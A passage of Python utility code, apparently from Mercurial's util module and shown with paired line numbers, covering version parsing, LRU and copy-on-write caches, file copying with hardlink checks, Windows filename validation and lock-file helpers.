1019 1022 (4, 6, None, 'rc0+12-425d55e54f98')
1020 1023 >>> versiontuple(b'.1.2.3')
1021 1024 (None, None, None, '.1.2.3')
1022 1025 >>> versiontuple(b'12.34..5')
1023 1026 (12, 34, None, '..5')
1024 1027 >>> versiontuple(b'1.2.3.4.5.6')
1025 1028 (1, 2, 3, '.4.5.6')
1026 1029 """
1027 1030 if not v:
1028 1031 v = version()
1029 1032 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1030 1033 if not m:
1031 1034 vparts, extra = '', v
1032 1035 elif m.group(2):
1033 1036 vparts, extra = m.groups()
1034 1037 else:
1035 1038 vparts, extra = m.group(1), None
1036 1039
1037 1040 vints = []
1038 1041 for i in vparts.split('.'):
1039 1042 try:
1040 1043 vints.append(int(i))
1041 1044 except ValueError:
1042 1045 break
1043 1046 # (3, 6) -> (3, 6, None)
1044 1047 while len(vints) < 3:
1045 1048 vints.append(None)
1046 1049
1047 1050 if n == 2:
1048 1051 return (vints[0], vints[1])
1049 1052 if n == 3:
1050 1053 return (vints[0], vints[1], vints[2])
1051 1054 if n == 4:
1052 1055 return (vints[0], vints[1], vints[2], extra)
1053 1056
1054 1057 def cachefunc(func):
1055 1058 '''cache the result of function calls'''
1056 1059 # XXX doesn't handle keywords args
1057 1060 if func.__code__.co_argcount == 0:
1058 1061 cache = []
1059 1062 def f():
1060 1063 if len(cache) == 0:
1061 1064 cache.append(func())
1062 1065 return cache[0]
1063 1066 return f
1064 1067 cache = {}
1065 1068 if func.__code__.co_argcount == 1:
1066 1069 # we gain a small amount of time because
1067 1070 # we don't need to pack/unpack the list
1068 1071 def f(arg):
1069 1072 if arg not in cache:
1070 1073 cache[arg] = func(arg)
1071 1074 return cache[arg]
1072 1075 else:
1073 1076 def f(*args):
1074 1077 if args not in cache:
1075 1078 cache[args] = func(*args)
1076 1079 return cache[args]
1077 1080
1078 1081 return f
1079 1082
1080 1083 class cow(object):
1081 1084 """helper class to make copy-on-write easier
1082 1085
1083 1086 Call preparewrite before doing any writes.
1084 1087 """
1085 1088
1086 1089 def preparewrite(self):
1087 1090 """call this before writes, return self or a copied new object"""
1088 1091 if getattr(self, '_copied', 0):
1089 1092 self._copied -= 1
1090 1093 return self.__class__(self)
1091 1094 return self
1092 1095
1093 1096 def copy(self):
1094 1097 """always do a cheap copy"""
1095 1098 self._copied = getattr(self, '_copied', 0) + 1
1096 1099 return self
1097 1100
1098 1101 class sortdict(collections.OrderedDict):
1099 1102 '''a simple sorted dictionary
1100 1103
1101 1104 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1102 1105 >>> d2 = d1.copy()
1103 1106 >>> d2
1104 1107 sortdict([('a', 0), ('b', 1)])
1105 1108 >>> d2.update([(b'a', 2)])
1106 1109 >>> list(d2.keys()) # should still be in last-set order
1107 1110 ['b', 'a']
1108 1111 '''
1109 1112
1110 1113 def __setitem__(self, key, value):
1111 1114 if key in self:
1112 1115 del self[key]
1113 1116 super(sortdict, self).__setitem__(key, value)
1114 1117
1115 1118 if pycompat.ispypy:
1116 1119 # __setitem__() isn't called as of PyPy 5.8.0
1117 1120 def update(self, src):
1118 1121 if isinstance(src, dict):
1119 1122 src = src.iteritems()
1120 1123 for k, v in src:
1121 1124 self[k] = v
1122 1125
1123 1126 class cowdict(cow, dict):
1124 1127 """copy-on-write dict
1125 1128
1126 1129 Be sure to call d = d.preparewrite() before writing to d.
1127 1130
1128 1131 >>> a = cowdict()
1129 1132 >>> a is a.preparewrite()
1130 1133 True
1131 1134 >>> b = a.copy()
1132 1135 >>> b is a
1133 1136 True
1134 1137 >>> c = b.copy()
1135 1138 >>> c is a
1136 1139 True
1137 1140 >>> a = a.preparewrite()
1138 1141 >>> b is a
1139 1142 False
1140 1143 >>> a is a.preparewrite()
1141 1144 True
1142 1145 >>> c = c.preparewrite()
1143 1146 >>> b is c
1144 1147 False
1145 1148 >>> b is b.preparewrite()
1146 1149 True
1147 1150 """
1148 1151
1149 1152 class cowsortdict(cow, sortdict):
1150 1153 """copy-on-write sortdict
1151 1154
1152 1155 Be sure to call d = d.preparewrite() before writing to d.
1153 1156 """
1154 1157
1155 1158 class transactional(object):
1156 1159 """Base class for making a transactional type into a context manager."""
1157 1160 __metaclass__ = abc.ABCMeta
1158 1161
1159 1162 @abc.abstractmethod
1160 1163 def close(self):
1161 1164 """Successfully closes the transaction."""
1162 1165
1163 1166 @abc.abstractmethod
1164 1167 def release(self):
1165 1168 """Marks the end of the transaction.
1166 1169
1167 1170 If the transaction has not been closed, it will be aborted.
1168 1171 """
1169 1172
1170 1173 def __enter__(self):
1171 1174 return self
1172 1175
1173 1176 def __exit__(self, exc_type, exc_val, exc_tb):
1174 1177 try:
1175 1178 if exc_type is None:
1176 1179 self.close()
1177 1180 finally:
1178 1181 self.release()
1179 1182
1180 1183 @contextlib.contextmanager
1181 1184 def acceptintervention(tr=None):
1182 1185 """A context manager that closes the transaction on InterventionRequired
1183 1186
1184 1187 If no transaction was provided, this simply runs the body and returns
1185 1188 """
1186 1189 if not tr:
1187 1190 yield
1188 1191 return
1189 1192 try:
1190 1193 yield
1191 1194 tr.close()
1192 1195 except error.InterventionRequired:
1193 1196 tr.close()
1194 1197 raise
1195 1198 finally:
1196 1199 tr.release()
1197 1200
1198 1201 @contextlib.contextmanager
1199 1202 def nullcontextmanager():
1200 1203 yield
1201 1204
1202 1205 class _lrucachenode(object):
1203 1206 """A node in a doubly linked list.
1204 1207
1205 1208 Holds a reference to nodes on either side as well as a key-value
1206 1209 pair for the dictionary entry.
1207 1210 """
1208 1211 __slots__ = (u'next', u'prev', u'key', u'value')
1209 1212
1210 1213 def __init__(self):
1211 1214 self.next = None
1212 1215 self.prev = None
1213 1216
1214 1217 self.key = _notset
1215 1218 self.value = None
1216 1219
1217 1220 def markempty(self):
1218 1221 """Mark the node as emptied."""
1219 1222 self.key = _notset
1220 1223
1221 1224 class lrucachedict(object):
1222 1225 """Dict that caches most recent accesses and sets.
1223 1226
1224 1227 The dict consists of an actual backing dict - indexed by original
1225 1228 key - and a doubly linked circular list defining the order of entries in
1226 1229 the cache.
1227 1230
1228 1231 The head node is the newest entry in the cache. If the cache is full,
1229 1232 we recycle head.prev and make it the new head. Cache accesses result in
1230 1233 the node being moved to before the existing head and being marked as the
1231 1234 new head node.
1232 1235 """
1233 1236 def __init__(self, max):
1234 1237 self._cache = {}
1235 1238
1236 1239 self._head = head = _lrucachenode()
1237 1240 head.prev = head
1238 1241 head.next = head
1239 1242 self._size = 1
1240 1243 self._capacity = max
1241 1244
1242 1245 def __len__(self):
1243 1246 return len(self._cache)
1244 1247
1245 1248 def __contains__(self, k):
1246 1249 return k in self._cache
1247 1250
1248 1251 def __iter__(self):
1249 1252 # We don't have to iterate in cache order, but why not.
1250 1253 n = self._head
1251 1254 for i in range(len(self._cache)):
1252 1255 yield n.key
1253 1256 n = n.next
1254 1257
1255 1258 def __getitem__(self, k):
1256 1259 node = self._cache[k]
1257 1260 self._movetohead(node)
1258 1261 return node.value
1259 1262
1260 1263 def __setitem__(self, k, v):
1261 1264 node = self._cache.get(k)
1262 1265 # Replace existing value and mark as newest.
1263 1266 if node is not None:
1264 1267 node.value = v
1265 1268 self._movetohead(node)
1266 1269 return
1267 1270
1268 1271 if self._size < self._capacity:
1269 1272 node = self._addcapacity()
1270 1273 else:
1271 1274 # Grab the last/oldest item.
1272 1275 node = self._head.prev
1273 1276
1274 1277 # At capacity. Kill the old entry.
1275 1278 if node.key is not _notset:
1276 1279 del self._cache[node.key]
1277 1280
1278 1281 node.key = k
1279 1282 node.value = v
1280 1283 self._cache[k] = node
1281 1284 # And mark it as newest entry. No need to adjust order since it
1282 1285 # is already self._head.prev.
1283 1286 self._head = node
1284 1287
1285 1288 def __delitem__(self, k):
1286 1289 node = self._cache.pop(k)
1287 1290 node.markempty()
1288 1291
1289 1292 # Temporarily mark as newest item before re-adjusting head to make
1290 1293 # this node the oldest item.
1291 1294 self._movetohead(node)
1292 1295 self._head = node.next
1293 1296
1294 1297 # Additional dict methods.
1295 1298
1296 1299 def get(self, k, default=None):
1297 1300 try:
1298 1301 return self._cache[k].value
1299 1302 except KeyError:
1300 1303 return default
1301 1304
1302 1305 def clear(self):
1303 1306 n = self._head
1304 1307 while n.key is not _notset:
1305 1308 n.markempty()
1306 1309 n = n.next
1307 1310
1308 1311 self._cache.clear()
1309 1312
1310 1313 def copy(self):
1311 1314 result = lrucachedict(self._capacity)
1312 1315 n = self._head.prev
1313 1316 # Iterate in oldest-to-newest order, so the copy has the right ordering
1314 1317 for i in range(len(self._cache)):
1315 1318 result[n.key] = n.value
1316 1319 n = n.prev
1317 1320 return result
1318 1321
1319 1322 def _movetohead(self, node):
1320 1323 """Mark a node as the newest, making it the new head.
1321 1324
1322 1325 When a node is accessed, it becomes the freshest entry in the LRU
1323 1326 list, which is denoted by self._head.
1324 1327
1325 1328 Visually, let's make ``N`` the new head node (* denotes head):
1326 1329
1327 1330 previous/oldest <-> head <-> next/next newest
1328 1331
1329 1332 ----<->--- A* ---<->-----
1330 1333 | |
1331 1334 E <-> D <-> N <-> C <-> B
1332 1335
1333 1336 To:
1334 1337
1335 1338 ----<->--- N* ---<->-----
1336 1339 | |
1337 1340 E <-> D <-> C <-> B <-> A
1338 1341
1339 1342 This requires the following moves:
1340 1343
1341 1344 C.next = D (node.prev.next = node.next)
1342 1345 D.prev = C (node.next.prev = node.prev)
1343 1346 E.next = N (head.prev.next = node)
1344 1347 N.prev = E (node.prev = head.prev)
1345 1348 N.next = A (node.next = head)
1346 1349 A.prev = N (head.prev = node)
1347 1350 """
1348 1351 head = self._head
1349 1352 # C.next = D
1350 1353 node.prev.next = node.next
1351 1354 # D.prev = C
1352 1355 node.next.prev = node.prev
1353 1356 # N.prev = E
1354 1357 node.prev = head.prev
1355 1358 # N.next = A
1356 1359 # It is tempting to do just "head" here, however if node is
1357 1360 # adjacent to head, this will do bad things.
1358 1361 node.next = head.prev.next
1359 1362 # E.next = N
1360 1363 node.next.prev = node
1361 1364 # A.prev = N
1362 1365 node.prev.next = node
1363 1366
1364 1367 self._head = node
1365 1368
1366 1369 def _addcapacity(self):
1367 1370 """Add a node to the circular linked list.
1368 1371
1369 1372 The new node is inserted before the head node.
1370 1373 """
1371 1374 head = self._head
1372 1375 node = _lrucachenode()
1373 1376 head.prev.next = node
1374 1377 node.prev = head.prev
1375 1378 node.next = head
1376 1379 head.prev = node
1377 1380 self._size += 1
1378 1381 return node
1379 1382
1380 1383 def lrucachefunc(func):
1381 1384 '''cache most recent results of function calls'''
1382 1385 cache = {}
1383 1386 order = collections.deque()
1384 1387 if func.__code__.co_argcount == 1:
1385 1388 def f(arg):
1386 1389 if arg not in cache:
1387 1390 if len(cache) > 20:
1388 1391 del cache[order.popleft()]
1389 1392 cache[arg] = func(arg)
1390 1393 else:
1391 1394 order.remove(arg)
1392 1395 order.append(arg)
1393 1396 return cache[arg]
1394 1397 else:
1395 1398 def f(*args):
1396 1399 if args not in cache:
1397 1400 if len(cache) > 20:
1398 1401 del cache[order.popleft()]
1399 1402 cache[args] = func(*args)
1400 1403 else:
1401 1404 order.remove(args)
1402 1405 order.append(args)
1403 1406 return cache[args]
1404 1407
1405 1408 return f
1406 1409
1407 1410 class propertycache(object):
1408 1411 def __init__(self, func):
1409 1412 self.func = func
1410 1413 self.name = func.__name__
1411 1414 def __get__(self, obj, type=None):
1412 1415 result = self.func(obj)
1413 1416 self.cachevalue(obj, result)
1414 1417 return result
1415 1418
1416 1419 def cachevalue(self, obj, value):
1417 1420 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1418 1421 obj.__dict__[self.name] = value
1419 1422
1420 1423 def clearcachedproperty(obj, prop):
1421 1424 '''clear a cached property value, if one has been set'''
1422 1425 if prop in obj.__dict__:
1423 1426 del obj.__dict__[prop]
1424 1427
1425 1428 def increasingchunks(source, min=1024, max=65536):
1426 1429 '''return no less than min bytes per chunk while data remains,
1427 1430 doubling min after each chunk until it reaches max'''
1428 1431 def log2(x):
1429 1432 if not x:
1430 1433 return 0
1431 1434 i = 0
1432 1435 while x:
1433 1436 x >>= 1
1434 1437 i += 1
1435 1438 return i - 1
1436 1439
1437 1440 buf = []
1438 1441 blen = 0
1439 1442 for chunk in source:
1440 1443 buf.append(chunk)
1441 1444 blen += len(chunk)
1442 1445 if blen >= min:
1443 1446 if min < max:
1444 1447 min = min << 1
1445 1448 nmin = 1 << log2(blen)
1446 1449 if nmin > min:
1447 1450 min = nmin
1448 1451 if min > max:
1449 1452 min = max
1450 1453 yield ''.join(buf)
1451 1454 blen = 0
1452 1455 buf = []
1453 1456 if buf:
1454 1457 yield ''.join(buf)
1455 1458
1456 1459 def always(fn):
1457 1460 return True
1458 1461
1459 1462 def never(fn):
1460 1463 return False
1461 1464
1462 1465 def nogc(func):
1463 1466 """disable garbage collector
1464 1467
1465 1468 Python's garbage collector triggers a GC each time a certain number of
1466 1469 container objects (the number being defined by gc.get_threshold()) are
1467 1470 allocated even when marked not to be tracked by the collector. Tracking has
1468 1471 no effect on when GCs are triggered, only on what objects the GC looks
1469 1472 into. As a workaround, disable GC while building complex (huge)
1470 1473 containers.
1471 1474
1472 1475 This garbage collector issue have been fixed in 2.7. But it still affect
1473 1476 CPython's performance.
1474 1477 """
1475 1478 def wrapper(*args, **kwargs):
1476 1479 gcenabled = gc.isenabled()
1477 1480 gc.disable()
1478 1481 try:
1479 1482 return func(*args, **kwargs)
1480 1483 finally:
1481 1484 if gcenabled:
1482 1485 gc.enable()
1483 1486 return wrapper
1484 1487
1485 1488 if pycompat.ispypy:
1486 1489 # PyPy runs slower with gc disabled
1487 1490 nogc = lambda x: x
1488 1491
1489 1492 def pathto(root, n1, n2):
1490 1493 '''return the relative path from one place to another.
1491 1494 root should use os.sep to separate directories
1492 1495 n1 should use os.sep to separate directories
1493 1496 n2 should use "/" to separate directories
1494 1497 returns an os.sep-separated path.
1495 1498
1496 1499 If n1 is a relative path, it's assumed it's
1497 1500 relative to root.
1498 1501 n2 should always be relative to root.
1499 1502 '''
1500 1503 if not n1:
1501 1504 return localpath(n2)
1502 1505 if os.path.isabs(n1):
1503 1506 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1504 1507 return os.path.join(root, localpath(n2))
1505 1508 n2 = '/'.join((pconvert(root), n2))
1506 1509 a, b = splitpath(n1), n2.split('/')
1507 1510 a.reverse()
1508 1511 b.reverse()
1509 1512 while a and b and a[-1] == b[-1]:
1510 1513 a.pop()
1511 1514 b.pop()
1512 1515 b.reverse()
1513 1516 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1514 1517
1515 1518 # the location of data files matching the source code
1516 1519 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1517 1520 # executable version (py2exe) doesn't support __file__
1518 1521 datapath = os.path.dirname(pycompat.sysexecutable)
1519 1522 else:
1520 1523 datapath = os.path.dirname(pycompat.fsencode(__file__))
1521 1524
1522 1525 i18n.setdatapath(datapath)
1523 1526
1524 1527 def checksignature(func):
1525 1528 '''wrap a function with code to check for calling errors'''
1526 1529 def check(*args, **kwargs):
1527 1530 try:
1528 1531 return func(*args, **kwargs)
1529 1532 except TypeError:
1530 1533 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1531 1534 raise error.SignatureError
1532 1535 raise
1533 1536
1534 1537 return check
1535 1538
1536 1539 # a whilelist of known filesystems where hardlink works reliably
1537 1540 _hardlinkfswhitelist = {
1538 1541 'apfs',
1539 1542 'btrfs',
1540 1543 'ext2',
1541 1544 'ext3',
1542 1545 'ext4',
1543 1546 'hfs',
1544 1547 'jfs',
1545 1548 'NTFS',
1546 1549 'reiserfs',
1547 1550 'tmpfs',
1548 1551 'ufs',
1549 1552 'xfs',
1550 1553 'zfs',
1551 1554 }
1552 1555
1553 1556 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1554 1557 '''copy a file, preserving mode and optionally other stat info like
1555 1558 atime/mtime
1556 1559
1557 1560 checkambig argument is used with filestat, and is useful only if
1558 1561 destination file is guarded by any lock (e.g. repo.lock or
1559 1562 repo.wlock).
1560 1563
1561 1564 copystat and checkambig should be exclusive.
1562 1565 '''
1563 1566 assert not (copystat and checkambig)
1564 1567 oldstat = None
1565 1568 if os.path.lexists(dest):
1566 1569 if checkambig:
1567 1570 oldstat = checkambig and filestat.frompath(dest)
1568 1571 unlink(dest)
1569 1572 if hardlink:
1570 1573 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1571 1574 # unless we are confident that dest is on a whitelisted filesystem.
1572 1575 try:
1573 1576 fstype = getfstype(os.path.dirname(dest))
1574 1577 except OSError:
1575 1578 fstype = None
1576 1579 if fstype not in _hardlinkfswhitelist:
1577 1580 hardlink = False
1578 1581 if hardlink:
1579 1582 try:
1580 1583 oslink(src, dest)
1581 1584 return
1582 1585 except (IOError, OSError):
1583 1586 pass # fall back to normal copy
1584 1587 if os.path.islink(src):
1585 1588 os.symlink(os.readlink(src), dest)
1586 1589 # copytime is ignored for symlinks, but in general copytime isn't needed
1587 1590 # for them anyway
1588 1591 else:
1589 1592 try:
1590 1593 shutil.copyfile(src, dest)
1591 1594 if copystat:
1592 1595 # copystat also copies mode
1593 1596 shutil.copystat(src, dest)
1594 1597 else:
1595 1598 shutil.copymode(src, dest)
1596 1599 if oldstat and oldstat.stat:
1597 1600 newstat = filestat.frompath(dest)
1598 1601 if newstat.isambig(oldstat):
1599 1602 # stat of copied file is ambiguous to original one
1600 1603 advanced = (
1601 1604 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1602 1605 os.utime(dest, (advanced, advanced))
1603 1606 except shutil.Error as inst:
1604 1607 raise error.Abort(str(inst))
1605 1608
1606 1609 def copyfiles(src, dst, hardlink=None, progress=None):
1607 1610 """Copy a directory tree using hardlinks if possible."""
1608 1611 num = 0
1609 1612
1610 1613 def settopic():
1611 1614 if progress:
1612 1615 progress.topic = _('linking') if hardlink else _('copying')
1613 1616
1614 1617 if os.path.isdir(src):
1615 1618 if hardlink is None:
1616 1619 hardlink = (os.stat(src).st_dev ==
1617 1620 os.stat(os.path.dirname(dst)).st_dev)
1618 1621 settopic()
1619 1622 os.mkdir(dst)
1620 1623 for name, kind in listdir(src):
1621 1624 srcname = os.path.join(src, name)
1622 1625 dstname = os.path.join(dst, name)
1623 1626 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1624 1627 num += n
1625 1628 else:
1626 1629 if hardlink is None:
1627 1630 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1628 1631 os.stat(os.path.dirname(dst)).st_dev)
1629 1632 settopic()
1630 1633
1631 1634 if hardlink:
1632 1635 try:
1633 1636 oslink(src, dst)
1634 1637 except (IOError, OSError):
1635 1638 hardlink = False
1636 1639 shutil.copy(src, dst)
1637 1640 else:
1638 1641 shutil.copy(src, dst)
1639 1642 num += 1
1640 1643 if progress:
1641 1644 progress.increment()
1642 1645
1643 1646 return hardlink, num
1644 1647
1645 1648 _winreservednames = {
1646 1649 'con', 'prn', 'aux', 'nul',
1647 1650 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1648 1651 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1649 1652 }
1650 1653 _winreservedchars = ':*?"<>|'
1651 1654 def checkwinfilename(path):
1652 1655 r'''Check that the base-relative path is a valid filename on Windows.
1653 1656 Returns None if the path is ok, or a UI string describing the problem.
1654 1657
1655 1658 >>> checkwinfilename(b"just/a/normal/path")
1656 1659 >>> checkwinfilename(b"foo/bar/con.xml")
1657 1660 "filename contains 'con', which is reserved on Windows"
1658 1661 >>> checkwinfilename(b"foo/con.xml/bar")
1659 1662 "filename contains 'con', which is reserved on Windows"
1660 1663 >>> checkwinfilename(b"foo/bar/xml.con")
1661 1664 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1662 1665 "filename contains 'AUX', which is reserved on Windows"
1663 1666 >>> checkwinfilename(b"foo/bar/bla:.txt")
1664 1667 "filename contains ':', which is reserved on Windows"
1665 1668 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1666 1669 "filename contains '\\x07', which is invalid on Windows"
1667 1670 >>> checkwinfilename(b"foo/bar/bla ")
1668 1671 "filename ends with ' ', which is not allowed on Windows"
1669 1672 >>> checkwinfilename(b"../bar")
1670 1673 >>> checkwinfilename(b"foo\\")
1671 1674 "filename ends with '\\', which is invalid on Windows"
1672 1675 >>> checkwinfilename(b"foo\\/bar")
1673 1676 "directory name ends with '\\', which is invalid on Windows"
1674 1677 '''
1675 1678 if path.endswith('\\'):
1676 1679 return _("filename ends with '\\', which is invalid on Windows")
1677 1680 if '\\/' in path:
1678 1681 return _("directory name ends with '\\', which is invalid on Windows")
1679 1682 for n in path.replace('\\', '/').split('/'):
1680 1683 if not n:
1681 1684 continue
1682 1685 for c in _filenamebytestr(n):
1683 1686 if c in _winreservedchars:
1684 1687 return _("filename contains '%s', which is reserved "
1685 1688 "on Windows") % c
1686 1689 if ord(c) <= 31:
1687 1690 return _("filename contains '%s', which is invalid "
1688 1691 "on Windows") % stringutil.escapestr(c)
1689 1692 base = n.split('.')[0]
1690 1693 if base and base.lower() in _winreservednames:
1691 1694 return _("filename contains '%s', which is reserved "
1692 1695 "on Windows") % base
1693 1696 t = n[-1:]
1694 1697 if t in '. ' and n not in '..':
1695 1698 return _("filename ends with '%s', which is not allowed "
1696 1699 "on Windows") % t
1697 1700
1698 1701 if pycompat.iswindows:
1699 1702 checkosfilename = checkwinfilename
1700 1703 timer = time.clock
1701 1704 else:
1702 1705 checkosfilename = platform.checkosfilename
1703 1706 timer = time.time
1704 1707
1705 1708 if safehasattr(time, "perf_counter"):
1706 1709 timer = time.perf_counter
1707 1710
1708 1711 def makelock(info, pathname):
1709 1712 """Create a lock file atomically if possible
1710 1713
1711 1714 This may leave a stale lock file if symlink isn't supported and signal
1712 1715 interrupt is enabled.
1713 1716 """
1714 1717 try:
1715 1718 return os.symlink(info, pathname)
1716 1719 except OSError as why:
1717 1720 if why.errno == errno.EEXIST:
1718 1721 raise
1719 1722 except AttributeError: # no symlink in os
1720 1723 pass
1721 1724
1722 1725 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1723 1726 ld = os.open(pathname, flags)
1724 1727 os.write(ld, info)
1725 1728 os.close(ld)
1726 1729
1727 1730 def readlock(pathname):
1728 1731 try:
1729 1732 return os.readlink(pathname)
1730 1733 except OSError as why:
1731 1734 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1732 1735 raise
1733 1736 except AttributeError: # no symlink in os
1734 1737 pass
1735 1738 fp = posixfile(pathname, 'rb')
1736 1739 r = fp.read()
1737 1740 fp.close()
1738 1741 return r
1739 1742
1740 1743 def fstat(fp):
1741 1744 '''stat file object that may not have fileno method.'''
1742 1745 try:
1743 1746 return os.fstat(fp.fileno())
1744 1747 except AttributeError:
1745 1748 return os.stat(fp.name)
1746 1749
1747 1750 # File system features
1748 1751
1749 1752 def fscasesensitive(path):
1750 1753 """
1751 1754 Return true if the given path is on a case-sensitive filesystem
1752 1755
1753 1756 Requires a path (like /foo/.hg) ending with a foldable final
1754 1757 directory component.
1755 1758 """
1756 1759 s1 = os.lstat(path)
1757 1760 d, b = os.path.split(path)
1758 1761 b2 = b.upper()
1759 1762 if b == b2:
1760 1763 b2 = b.lower()
1761 1764 if b == b2:
1762 1765 return True # no evidence against case sensitivity
1763 1766 p2 = os.path.join(d, b2)
1764 1767 try:
1765 1768 s2 = os.lstat(p2)
1766 1769 if s2 == s1:
1767 1770 return False
1768 1771 return True
1769 1772 except OSError:
1770 1773 return True
1771 1774
1772 1775 try:
1773 1776 import re2
1774 1777 _re2 = None
1775 1778 except ImportError:
1776 1779 _re2 = False
1777 1780
1778 1781 class _re(object):
1779 1782 def _checkre2(self):
1780 1783 global _re2
1781 1784 try:
1782 1785 # check if match works, see issue3964
1783 1786 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1784 1787 except ImportError:
1785 1788 _re2 = False
1786 1789
1787 1790 def compile(self, pat, flags=0):
1788 1791 '''Compile a regular expression, using re2 if possible
1789 1792
1790 1793 For best performance, use only re2-compatible regexp features. The
1791 1794 only flags from the re module that are re2-compatible are
1792 1795 IGNORECASE and MULTILINE.'''
1793 1796 if _re2 is None:
1794 1797 self._checkre2()
1795 1798 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1796 1799 if flags & remod.IGNORECASE:
1797 1800 pat = '(?i)' + pat
1798 1801 if flags & remod.MULTILINE:
1799 1802 pat = '(?m)' + pat
1800 1803 try:
1801 1804 return re2.compile(pat)
1802 1805 except re2.error:
1803 1806 pass
1804 1807 return remod.compile(pat, flags)
1805 1808
1806 1809 @propertycache
1807 1810 def escape(self):
1808 1811 '''Return the version of escape corresponding to self.compile.
1809 1812
1810 1813 This is imperfect because whether re2 or re is used for a particular
1811 1814 function depends on the flags, etc, but it's the best we can do.
1812 1815 '''
1813 1816 global _re2
1814 1817 if _re2 is None:
1815 1818 self._checkre2()
1816 1819 if _re2:
1817 1820 return re2.escape
1818 1821 else:
1819 1822 return remod.escape
1820 1823
1821 1824 re = _re()
1822 1825
1823 1826 _fspathcache = {}
1824 1827 def fspath(name, root):
1825 1828 '''Get name in the case stored in the filesystem
1826 1829
1827 1830 The name should be relative to root, and be normcase-ed for efficiency.
1828 1831
1829 1832 Note that this function is unnecessary, and should not be
1830 1833 called, for case-sensitive filesystems (simply because it's expensive).
1831 1834
1832 1835 The root should be normcase-ed, too.
1833 1836 '''
1834 1837 def _makefspathcacheentry(dir):
1835 1838 return dict((normcase(n), n) for n in os.listdir(dir))
1836 1839
1837 1840 seps = pycompat.ossep
1838 1841 if pycompat.osaltsep:
1839 1842 seps = seps + pycompat.osaltsep
1840 1843 # Protect backslashes. This gets silly very quickly.
1841 1844 seps.replace('\\','\\\\')
1842 1845 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1843 1846 dir = os.path.normpath(root)
1844 1847 result = []
1845 1848 for part, sep in pattern.findall(name):
1846 1849 if sep:
1847 1850 result.append(sep)
1848 1851 continue
1849 1852
1850 1853 if dir not in _fspathcache:
1851 1854 _fspathcache[dir] = _makefspathcacheentry(dir)
1852 1855 contents = _fspathcache[dir]
1853 1856
1854 1857 found = contents.get(part)
1855 1858 if not found:
1856 1859 # retry "once per directory" per "dirstate.walk" which
1857 1860 # may take place for each patches of "hg qpush", for example
1858 1861 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1859 1862 found = contents.get(part)
1860 1863
1861 1864 result.append(found or part)
1862 1865 dir = os.path.join(dir, part)
1863 1866
1864 1867 return ''.join(result)
1865 1868
1866 1869 def checknlink(testfile):
1867 1870 '''check whether hardlink count reporting works properly'''
1868 1871
1869 1872 # testfile may be open, so we need a separate file for checking to
1870 1873 # work around issue2543 (or testfile may get lost on Samba shares)
1871 1874 f1, f2, fp = None, None, None
1872 1875 try:
1873 1876 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1874 1877 suffix='1~', dir=os.path.dirname(testfile))
1875 1878 os.close(fd)
1876 1879 f2 = '%s2~' % f1[:-2]
1877 1880
1878 1881 oslink(f1, f2)
1879 1882 # nlinks() may behave differently for files on Windows shares if
1880 1883 # the file is open.
1881 1884 fp = posixfile(f2)
1882 1885 return nlinks(f2) > 1
1883 1886 except OSError:
1884 1887 return False
1885 1888 finally:
1886 1889 if fp is not None:
1887 1890 fp.close()
1888 1891 for f in (f1, f2):
1889 1892 try:
1890 1893 if f is not None:
1891 1894 os.unlink(f)
1892 1895 except OSError:
1893 1896 pass
1894 1897
1895 1898 def endswithsep(path):
1896 1899 '''Check path ends with os.sep or os.altsep.'''
1897 1900 return (path.endswith(pycompat.ossep)
1898 1901 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1899 1902
1900 1903 def splitpath(path):
1901 1904 '''Split path by os.sep.
1902 1905 Note that this function does not use os.altsep because this is
1903 1906 an alternative of simple "xxx.split(os.sep)".
1904 1907 It is recommended to use os.path.normpath() before using this
1905 1908 function if need.'''
1906 1909 return path.split(pycompat.ossep)
1907 1910
1908 1911 def mktempcopy(name, emptyok=False, createmode=None):
1909 1912 """Create a temporary file with the same contents from name
1910 1913
1911 1914 The permission bits are copied from the original file.
1912 1915
1913 1916 If the temporary file is going to be truncated immediately, you
1914 1917 can use emptyok=True as an optimization.
1915 1918
1916 1919 Returns the name of the temporary file.
1917 1920 """
1918 1921 d, fn = os.path.split(name)
1919 1922 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1920 1923 os.close(fd)
1921 1924 # Temporary files are created with mode 0600, which is usually not
1922 1925 # what we want. If the original file already exists, just copy
1923 1926 # its mode. Otherwise, manually obey umask.
1924 1927 copymode(name, temp, createmode)
1925 1928 if emptyok:
1926 1929 return temp
1927 1930 try:
1928 1931 try:
1929 1932 ifp = posixfile(name, "rb")
1930 1933 except IOError as inst:
1931 1934 if inst.errno == errno.ENOENT:
1932 1935 return temp
1933 1936 if not getattr(inst, 'filename', None):
1934 1937 inst.filename = name
1935 1938 raise
1936 1939 ofp = posixfile(temp, "wb")
1937 1940 for chunk in filechunkiter(ifp):
1938 1941 ofp.write(chunk)
1939 1942 ifp.close()
1940 1943 ofp.close()
1941 1944 except: # re-raises
1942 1945 try:
1943 1946 os.unlink(temp)
1944 1947 except OSError:
1945 1948 pass
1946 1949 raise
1947 1950 return temp
1948 1951
1949 1952 class filestat(object):
